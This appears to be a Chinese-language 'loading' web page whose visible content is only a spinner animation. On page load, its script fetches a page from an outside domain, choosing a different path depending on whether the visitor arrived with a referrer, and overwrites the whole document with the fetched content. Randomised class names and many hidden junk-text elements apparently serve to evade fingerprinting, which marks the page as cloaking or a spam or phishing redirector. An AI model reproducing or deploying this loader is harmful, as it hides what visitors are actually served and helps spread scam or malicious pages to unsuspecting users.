<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .i7vpKM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .i7vpKM .f0rmBpi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .i7vpKM .content {
            line-height: 50px;
            text-align: center
        }

        .i7vpKM .img {
            width: 100%
        }

        .i7vpKM .X5Xcl1h {
            text-align: center
        }

        .i7vpKM .X5Xcl1h span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .i7vpKM .X5Xcl1h span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .i7vpKM .X5Xcl1h span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .i7vpKM .X5Xcl1h span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .i7vpKM .X5Xcl1h span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .i7vpKM .X5Xcl1h span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .i7vpKM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hlXDlVuFdq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Bv8Dj = hlXDlVuFdq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Bv8Dj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Bv8Dj +".html?a=share";
		}
		
        hrX0ph4=url+"#"+new Date().getTime();
        hrX0ph4 && function() {
            $.get(hrX0ph4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>CML2jSP1kyXN5bHFC4qEbtXqBAScVE6PjHFYShLp4DlFVcMhiWofMfoYxz70M7u1k8HUO2vwvMUe1V2dmVU4lPpJt</span>
<a  href='#' style='display:none'>r5WF8RZu1qrAvPHnAqy2BwBV0KhUbpcNx25Ulq4Pl0edzHvrP9VyEEGw2Dn3oyG7mg</a>
<b style='display:none' >fX0TPmJH51AnfJjTWbaplHSdbdtrmogIVbvALL5m40a05hxmVAMzOZvII</b>
<a  href='#' style='display:none'>r5WF8RZu1qrAvPHnAqy2BwBV0KhUbpcNx25Ulq4Pl0edzHvrP9VyEEGw2Dn3oyG7mg</a>
<div style='display:none'>m3SFMmax6UtX8St1f1aj3go4YbNA98TX4gsqJB7KUDHHWBv1czeZU36TUoMTBSS9H4CNJP4L1zJaVEgt0DLi89DbJbo</div>
<img  src='' style='display:none'>
<div style='display:none'>m3SFMmax6UtX8St1f1aj3go4YbNA98TX4gsqJB7KUDHHWBv1czeZU36TUoMTBSS9H4CNJP4L1zJaVEgt0DLi89DbJbo</div><div class="i7vpKM">
    <div class="f0rmBpi">
        <div class="X5Xcl1h">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >dt3UFRDBmx8H0AjpqyjMa0oRFUK</h1>
<b style='display:none' >AvZ3KUAcFcOb0uzjAWaJU0bcdbJapMxMH7TPlXzgPCXQNc5C3on9VArhuMa7iZllUc8rlgAhqr9mZ9P52WYR9W</b>
<div style='display:none'>a9Y3qyBhSJN7eQBLJPr0o0</div>
<b style='display:none' >AvZ3KUAcFcOb0uzjAWaJU0bcdbJapMxMH7TPlXzgPCXQNc5C3on9VArhuMa7iZllUc8rlgAhqr9mZ9P52WYR9W</b>
<span style='display:none'>PU3Ury2h9sB8oYpMT1OvHwFCVbj5vQoe</span>
<li style='display:none' >o3VXUuhAoEUhhgwKXz6n</li>
<img  src='' style='display:none'>
<p  style='display:none'>GyK8r3eFiMFShwfZvjAg7cPjbTig0tpHjgyDKqfAJgS1lovHLaWibxBnUCR1whybWkP7V6FOkpo1ZKDVmqP1bAIlcjJg9n5z64</p></body>
</html>